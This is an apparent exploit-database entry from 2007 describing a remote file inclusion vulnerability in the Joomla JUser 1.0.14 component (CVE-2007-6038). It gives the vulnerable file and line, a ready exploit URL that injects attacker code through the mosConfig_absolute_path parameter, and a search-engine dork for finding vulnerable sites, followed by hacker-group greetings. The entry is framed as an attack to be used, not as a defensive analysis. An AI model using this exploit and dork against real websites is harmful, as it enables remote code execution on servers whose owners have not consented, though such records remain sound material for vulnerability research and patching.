Joomla! Component juser 1.0.14 - Remote File Inclusion

Author: NoGe
type: webapps
platform: php
port: 
date_added: 2007-11-18 
date_updated:  
verified: 1 
codes: OSVDB-39488;CVE-2007-6038 
tags: 
aliases:  
screenshot_url:  
application_url: 

==================================================================================================================================

# JUser Joomla Component 1.0.14 Remote File Include Vulnerability

    Component     : com_juser version 1.0.14 - paid component
    Vendor        : www.joomlaequipment.com
    Discovered by : NoGe
    Contact       : pace[dot]noge[at]hotmail[dot]com

==================================================================================================================================

# Vulnerable file

    /administrator/components/com_juser/xajax_functions.php

    line 4 require ($mosConfig_absolute_path.'/administrator/components/com_juser/xajax/xajax_core/xajax.inc.php');



# Exploit

    http://localhost/path/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=[evilcode]



# D0rk

    inurl:com_juser

==================================================================================================================================

# Greetz

    all crew #papuahacker #baliemhackerlink #nyubicrew
    skulmatic OLiBekaS ulga Cungkee nyubi k1tk4t str0ke newbie
    yooogy H312Y Vrs-hCk Oon_Boy Paman mousekill }^-^{ haliq
    http://kapukvalley.net member

==================================================================================================================================

# milw0rm.com [2007-11-19]